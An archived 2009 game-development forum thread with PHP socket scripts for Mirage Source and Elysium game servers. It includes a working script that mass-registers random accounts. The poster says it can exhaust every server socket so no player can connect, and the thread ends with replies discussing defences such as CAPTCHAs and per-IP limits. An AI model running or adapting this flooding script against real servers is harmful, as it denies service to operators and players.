Mirage Source :: View topic - PHP Scripts. . . =(

<?php
/* Variables used in this script:
- $_socket    The socket variable.
- $_connection    The connection attempt variable.
- $_packet    The outgoing data variable.
- $_data    The incoming data variable.

- $_sc    SEP_CHAR
- $_ec    END_CHAR

- $username
- $password
*/

function random_username(){
   $length = rand(3, 14);
   for( $i = 1; $i <= $length; $i++ ){
      $username .= chr(rand(97, 122));
   };

   return $username;
};

for( $i = 0; $i <= 50; $i++ ){
   $username = random_username();
   $password = 'phpscript';

   if( $username != NULL && $password != NULL ){
      set_time_limit(0); // How long should this script run before it stops?

      $_socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP) or die(socket_strerror(socket_last_error())); // Create the socket.
      $_connection = @socket_connect($_socket, 'localhost', 7000) or die(socket_strerror(socket_last_error())); // Connect to server.

      $_sc = chr(0); // SEP_CHAR
      $_ec = chr(237); // END_CHAR

      // New Account Packet
      $_packet = 2 . $_sc . $username . $_sc . $password . $_ec; // Create the packet data.
      @socket_write($_socket, $_packet) or die(socket_strerror(socket_last_error()));

      if( $_data = @socket_read($_socket, 1024) ){
         $_data = explode($_sc, trim($_data, $_ec)); // Explode $_sc.
         $_data[1] = strtolower($_data[1]); // Discard all information except the message that was sent and put everything in lowercase (easier comparison).

         if( $_data[1] == 'your account has been created!' ){ // We received a message that the account was successfully created.
            echo 'Your account, (username: ' . $username . ', password: ' . $password . '), has been created.';
         }elseif( $_data[1] == 'sorry, that account name is already taken!' ){ // The requested username already exists.
            echo 'That account name is already taken.';
         }else{
            echo 'Unknown error.';
         };

         echo "<br>\r\n";
      };

      @socket_shutdown($_socket); // Shutdown the socket.       // or die(socket_strerror(socket_last_error()));
      @socket_close($_socket); // Close the socket.       // or die(socket_strerror(socket_last_error()));
   }else{
      echo 'No username/password specified.';
   };
};
?>

<?php
/* Variables used in this script:
- $_dir    Directory to where the users' accounts are stored.
- $_filename    Filename of the user that is going to be created.
- $_handle    Opened file handle.
- $_data    The .ini file data.

- $username
- $password
*/

$username = 'cruzn';
$password = 'notcruzn';

$_dir = 'C:\\Documents and Settings\\path\\to\\Accounts\\'; // Notice: TRAILING SLASH.
$_filename = $username . '.ini'; // Filename of the user (simply the requested username with .ini at the end.

if( file_exists($_dir) ){ // Make sure the directory we want exists.
   if( !file_exists($_dir . $_filename) ){ // Check to see if the file exists (failure = username already taken).
      if( $_handle = fopen($_dir . $_filename, "w") ){ // Username is free, open (and create) the user's .ini file.
         // This is all the data that will be put into the user's .ini file.
         $_data = '[GENERAL]
Login=' . $username . '
Password=' . $password . '
[CHAR1]
Class=1
Map=1
X=10
Y=6
[CHAR2]
Class=1
Map=1
X=10
Y=6
[CHAR3]
Class=1
Map=1
X=10
Y=6';

         fwrite($_handle, $_data) or die('Error writing to file.'); // Create the account by writing in all the data.
         fclose($_handle) or die; // Close the file.
      };
   }else{ // The account already exists.
      echo 'Account already exists.';
   };
}else{
   echo 'Could not find the specified directory.';
};
?>

<?
set_time_limit(2);

$socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); // Create the Socket
$connection = @socket_connect($socket, "127.0.0.1", 4000); // Connect to server

$message = "whosonline" . chr(0) . chr(237);
@socket_write($socket, $message) or die("Could not write output.");

$data = @socket_read($socket, 2046);
list($packet, $data, $a) = explode(chr(0), $data);

echo "1: " . $packet . " = \"" . $data . "\"";
if( $packet == "PLAYERMSG" ){
   if( @preg_match('#There are (.*?) other players online:#', $data, $a) ){
      if( @preg_match('#There are ' . $a[1] . ' other players online: (.*).#', $data, $b) ){
         $players = explode(", ", $b[1]);
         while( list(, $id) = each($players) ){
            echo "Player: " . $id . "\n<br>";
            $message = "playerinforequest" . chr(0) . $id . chr(237);
            @socket_write($socket, $message) or die("Could not write output.");

            $data = @socket_read($socket, 2046);
            list($packet, $data) = explode(chr(0), $data);
            if( $packet == "PLAYERMSG" ){
               echo $data . '<br>';
            };
         };
      };
   }elseif( $data == "There are no other players online." ){
      @socket_close($socket);
      die('No players online.');
   }else{
      @socket_close($socket);
      die('Received incorrect data. "' . $data . '"');
   };
};
?>

Author:	Cruzn [ Fri Apr 10, 2009 1:32 am ]
Post subject:	PHP Scripts. . . =(
Just so you guys know, the default MS4/MS3.0.3/etc. are all susceptible to malicious PHP scripts. PHP Code: This scriptlet creates 51 accounts with randomly generated usernames. The password is static simply because I was lazy and this is only for demonstration purposes. It only takes a few seconds for this script to create 500 accounts. Basically, it's not super harmful to gameplay other than taking up one socket, using some bandwith, and wasting space (but when you can buy 1TB harddrives, the account sizes are negligible). This script is for MS4, but simply change the packet sent to the server and it will work for all versions. Code: <?php /* Variables used in this script: - $_socket The socket variable. - $_connection The connection attempt variable. - $_packet The outgoing data variable. - $_data The incoming data variable. - $_sc SEP_CHAR - $_ec END_CHAR - $username - $password */ function random_username(){ $length = rand(3, 14); for( $i = 1; $i <= $length; $i++ ){ $username .= chr(rand(97, 122)); }; return $username; }; for( $i = 0; $i <= 50; $i++ ){ $username = random_username(); $password = 'phpscript'; if( $username != NULL && $password != NULL ){ set_time_limit(0); // How long should this script run before it stops? $_socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP) or die(socket_strerror(socket_last_error())); // Create the socket. $_connection = @socket_connect($_socket, 'localhost', 7000) or die(socket_strerror(socket_last_error())); // Connect to server. $_sc = chr(0); // SEP_CHAR $_ec = chr(237); // END_CHAR // New Account Packet $_packet = 2 . $_sc . $username . $_sc . $password . $_ec; // Create the packet data. @socket_write($_socket, $_packet) or die(socket_strerror(socket_last_error())); if( $_data = @socket_read($_socket, 1024) ){ $_data = explode($_sc, trim($_data, $_ec)); // Explode $_sc. $_data[1] = strtolower($_data[1]); // Discard all information except the message that was sent and put everything in lowercase (easier comparison). if( $_data[1] == 'your account has been created!' ){ // We received a message that the account was successfully created. echo 'Your account, (username: ' . $username . ', password: ' . $password . '), has been created.'; }elseif( $_data[1] == 'sorry, that account name is already taken!' ){ // The requested username already exists. echo 'That account name is already taken.'; }else{ echo 'Unknown error.'; }; echo "<br>\r\n"; }; @socket_shutdown($_socket); // Shutdown the socket. // or die(socket_strerror(socket_last_error())); @socket_close($_socket); // Close the socket. // or die(socket_strerror(socket_last_error())); }else{ echo 'No username/password specified.'; }; }; ?> Images: SPOILER: (click to show) Have fun.

Author:	ExoShox [ Fri Apr 10, 2009 1:52 am ]
Post subject:	Re: PHP Scripts. . . =(
I assume this teaches how to take a server out? (At least if you have more than one person doing this at once on different IPs/Computers)

Author:	Tony [ Fri Apr 10, 2009 1:53 am ]
Post subject:	Re: PHP Scripts. . . =(
Wow, so registration through browser is possible?

Author:	Pbcrazy [ Fri Apr 10, 2009 1:55 am ]
Post subject:	Re: PHP Scripts. . . =(
ummm.... i would guess so...

Author:	Dragoons Master [ Fri Apr 10, 2009 1:56 am ]
Post subject:	Re: PHP Scripts. . . =(
Change your server to sql based. Then make it only possible to create account from the website, then add a CAPTCHA. Fixed.

Mirage Source http://miragesource.net/forums/

PHP Scripts. . . =( http://miragesource.net/forums/viewtopic.php?f=193&t=5448	Page 1 of 1

Author:	Cruzn [ Fri Apr 10, 2009 1:58 am ]
Post subject:	Re: PHP Scripts. . . =(
Senseika wrote: I assume this teaches how to take a server out? (At least if you have more than one person doing this at once on different IPs/Computers) Sure, a person could easily max out all the sockets on a single script. It wouldn't crash the server, but nobody would be able to connect. Tony wrote: Wow, so registration through browser is possible? Code: <?php /* Variables used in this script: - $_dir Directory to where the users' accounts are stored. - $_filename Filename of the user that is going to be created. - $_handle Opened file handle. - $_data The .ini file data. - $username - $password / $username = 'cruzn'; $password = 'notcruzn'; $_dir = 'C:\\Documents and Settings\\path\\to\\Accounts\\'; // Notice: TRAILING SLASH. $_filename = $username . '.ini'; // Filename of the user (simply the requested username with .ini at the end. if( file_exists($_dir) ){ // Make sure the directory we want exists. if( !file_exists($_dir . $_filename) ){ // Check to see if the file exists (failure = username already taken). if( $_handle = fopen($_dir . $_filename, "w") ){ // Username is free, open (and create) the user's .ini file. // This is all the data that will be put into the user's .ini file. $_data = '[GENERAL] Login=' . $username . ' Password=' . $password . ' [CHAR1] Class=1 Map=1 X=10 Y=6 [CHAR2] Class=1 Map=1 X=10 Y=6 [CHAR3] Class=1 Map=1 X=10 Y=6'; fwrite($_handle, $_data) or die('Error writing to file.'); // Create the account by writing in all the data. fclose($_handle) or die; // Close the file. }; }else{ // The account already exists. echo 'Account already exists.'; }; }else{ echo 'Could not find the specified directory.'; }; ?> Old code, and it's for Elysium, but yes -- you can register through a browser. Also, and online script (again, old code and for Elysium): Code:* <? set_time_limit(2); $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); // Create the Socket $connection = @socket_connect($socket, "127.0.0.1", 4000); // Connect to server $message = "whosonline" . chr(0) . chr(237); @socket_write($socket, $message) or die("Could not write output."); $data = @socket_read($socket, 2046); list($packet, $data, $a) = explode(chr(0), $data); echo "1: " . $packet . " = \"" . $data . "\""; if( $packet == "PLAYERMSG" ){ if( @preg_match('#There are (.?) other players online:#', $data, $a) ){ if( @preg_match('#There are ' . $a[1] . ' other players online: (.).#', $data, $b) ){ $players = explode(", ", $b[1]); while( list(, $id) = each($players) ){ echo "Player: " . $id . "\n<br>"; $message = "playerinforequest" . chr(0) . $id . chr(237); @socket_write($socket, $message) or die("Could not write output."); $data = @socket_read($socket, 2046); list($packet, $data) = explode(chr(0), $data); if( $packet == "PLAYERMSG" ){ echo $data . '<br>'; }; }; }; }elseif( $data == "There are no other players online." ){ @socket_close($socket); die('No players online.'); }else{ @socket_close($socket); die('Received incorrect data. "' . $data . '"'); }; }; ?>

Author:	Tony [ Fri Apr 10, 2009 1:59 am ]
Post subject:	Re: PHP Scripts. . . =(
Dragoons Master wrote: Change your server to sql based. Then make it only possible to create account from the website, then add a CAPTCHA. Fixed. You make it sound so easy :\

Author:	Asrrin29 [ Fri Apr 10, 2009 2:41 am ]
Post subject:	Re: PHP Scripts. . . =(
I'm already a step ahead of you, lol.

Author:	Dragoons Master [ Fri Apr 10, 2009 4:20 am ]
Post subject:	Re: PHP Scripts. . . =(
Tony wrote: Dragoons Master wrote: Change your server to sql based. Then make it only possible to create account from the website, then add a CAPTCHA. Fixed. You make it sound so easy :\ My game is already in mysql, so all I need is change the registration from the client to the browser.

Author:	Tony [ Fri Apr 10, 2009 6:40 am ]
Post subject:	Re: PHP Scripts. . . =(
So umm hows it unsafe if you can check if the packet came from your website?

Author:	Jacob [ Fri Apr 10, 2009 12:37 pm ]
Post subject:	Re: PHP Scripts. . . =(
You could be hardcore and limit the amount of accounts created per IP address.

Author:	phelpsy [ Fri Apr 10, 2009 7:35 pm ]
Post subject:	Re: PHP Scripts. . . =(
you could just limit an ip to making only two accounts per day problem solved or encrypt all the packets

Page 1 of 1	All times are UTC
Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/